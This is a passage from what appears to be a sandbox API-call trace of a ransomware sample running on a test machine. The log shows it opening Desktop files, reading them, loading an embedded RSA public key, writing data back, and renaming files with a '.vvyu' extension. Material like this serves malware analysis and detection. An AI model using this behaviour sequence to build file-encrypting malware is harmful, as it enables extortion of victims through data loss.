dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0191.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ecd1c8 | out: hHeap=0x620000) returned 1 [0191.932] GetCurrentThreadId () returned 0x66c [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64dd50 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0191.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.933] GetCurrentThreadId () returned 0x66c [0191.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0191.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0191.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0191.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0191.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93498 [0191.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0191.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0191.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934e0 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93480 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934f8 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93510 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93450 [0191.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93498 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ecd1c8 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ecd3d8 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2e914a8 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0191.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ecd5f0 [0191.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0191.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0191.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0191.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0191.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0191.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0191.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0191.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ecd3d8 | out: hHeap=0x620000) returned 1 [0191.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ecd5f0 | out: hHeap=0x620000) returned 1 [0191.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93480 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0191.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934b0 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94de0 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ecd1c8 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0191.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0191.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0191.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0191.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0191.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0191.942] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x25800, lpOverlapped=0x0) returned 1 [0191.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0191.944] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xb6a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.944] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0191.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0191.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0191.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0191.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0191.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0191.945] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0191.946] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.946] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.946] CloseHandle (hObject=0x568) returned 1 [0191.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x2ca5f18 [0191.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x2e96a68 [0191.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5f18 | out: hHeap=0x620000) returned 1 [0191.959] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe.vvyu")) returned 1 [0191.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0191.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0191.961] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0191.964] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84870af0, ftCreationTime.dwHighDateTime=0x1d89e4e, ftLastAccessTime.dwLowDateTime=0xf46b4f10, ftLastAccessTime.dwHighDateTime=0x1d8a511, ftLastWriteTime.dwLowDateTime=0xf46b4f10, ftLastWriteTime.dwHighDateTime=0x1d8a511, nFileSizeHigh=0x0, nFileSizeLow=0x328e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1IkZJVoATh.xls", cAlternateFileName="1IKZJV~1.XLS")) returned 1 [0191.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94de0 [0191.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0191.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94de0 | out: hHeap=0x620000) returned 1 [0191.964] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1IkZJVoATh.xls") returned=".xls" [0191.964] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1IkZJVoATh.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\1ikzjvoath.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0191.965] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=12942) returned 1 [0191.965] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0191.967] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x3268, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.967] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.970] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.970] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x328e, lpOverlapped=0x0) returned 1 [0191.971] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0191.971] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.971] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.971] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0191.972] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0191.972] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.972] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0191.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0191.972] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.972] GetLastError () returned 0x0 [0191.972] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.973] SetLastError (dwErrCode=0x0) [0191.973] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] GetLastError () returned 0x0 [0191.974] SetLastError (dwErrCode=0x0) [0191.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0191.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0191.975] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0191.975] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0191.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0191.975] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0191.975] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0191.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0191.975] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0191.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0191.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0191.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3290) returned 0x2e96a68 [0191.976] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: 